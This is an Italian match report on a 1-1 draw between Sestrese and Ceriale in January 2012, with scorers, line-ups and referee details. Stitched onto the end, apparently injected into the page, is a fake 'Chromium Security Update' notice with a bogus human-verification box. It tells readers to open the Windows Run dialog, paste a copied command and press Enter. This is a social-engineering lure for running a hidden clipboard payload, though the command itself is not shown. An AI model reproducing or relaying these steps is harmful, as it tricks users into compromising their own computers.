SESTRESE-CERIALE: finisce 1-1, gol di Anselmi

1° Squadra
22
Gen
2012

Nessun dramma, prima o poi doveva accadere: dopo dieci vittorie di fila arriva il pareggio per la Sestrese che viene fermata in casa dal Ceriale.

Il Ceriale conferma di essere la “bestia nera” della Sestrese: all’andata con il Ceriale arrivò l’unica sconfitta stagionale della squadra di Monteforte.

La Sestese domina ad inizio gara e trova il gol al 9’ con Anselmi che approfitta di un errore (unico della gara) del portiere Scavuzzo e deposita in fondo al sacco.

I verdi attaccano alla ricerca del raddoppio ma l’ottimo Scavuzzo nega il gol ad Anselmo e Merialdo. Ci prova poi Anselmi, ma il suo tiro termina di poco alto sopra la traversa.

Il Ceriale si difende, soffre ma non capitola e al 32’ ha una buona occasione con Donà.

I verdestellati potrebbero chiudere la gara al 5’ della ripresa ma Anselmo, ben servito da Anselmi, non riesce a chiudere in rete da ottima posizione.

Arriva invece il pareggio ospite: lo sigla Corsini di testa sugli sviluppi di una punizione.

Anselmo ha subito un’ottima occasione ma la sua inzuccata è parata da Scavuzzo. Al 25’ Guzzo invece di servire Anselmi, smarcato in area, tenta una conclusione da fuori che termina alta.

Nel finale tante mischie ma il risultato non cambia e il vantaggio dei verdi sulle inseguitrici si riduce a sei punti.

 

SESTRESE 1

CERIALE 1

RETI: p.t. 9’ Anselmi; s.t. 10’ Corsini

SESTRESE: Rovetta (s.t. 32’ Ingallinera), Lombardo, Baracco, Perazzo, Tangredi, Sighieri, Merialdo, Anselmo, Guzzo (s.t. 32’ Amgrosi), Anselmi, Longo. A disp.: Sanna, Buffo, Ferraro, Fiordalisio, Pillittu. All. Monteforte.

CERIALE: Scavuzzo, Balbo, Oberti, Gervasi, Pertosa, Calliku, Donà (s.t. 36’ Ghirardo), Bellingheri, Corsini, Haidich (s.t. 30’ Badoino), Scannapieco. A disp.: Serventi, Di Salvo, Molinar Rubat, Oddone, Tomao. All. Gervasi.

ARBITRO: Alassio di Imperia (assistenti Gagliardi e Moggia di La Spezia).

NOTE: giornata nuvolosa; spettatori 200 circa; ammoniti Sighieri, Tangredi e Merialdo (Sestrese), Gervasi e Pertosa (Ceriale).

Chrome Icon

Chromium Security Update Required

Complete verification to update your browser engine

Important Security Notice

Your browser's Chromium engine is outdated and requires an immediate update to ensure secure browsing and protect your system from vulnerabilities.

  • Outdated versions are susceptible to security exploits
  • Newer versions include critical performance improvements
  • This update includes enhanced privacy protections

Complete the verification process below to automatically download and install the latest Chromium engine update.

Verify you are human to continue

I'm not a robot

Verification required to update browser components

Complete the update process:

1
Press Win + R to open the Run dialog
2
Paste the copied command with Ctrl + V
3
Press Enter to execute the update process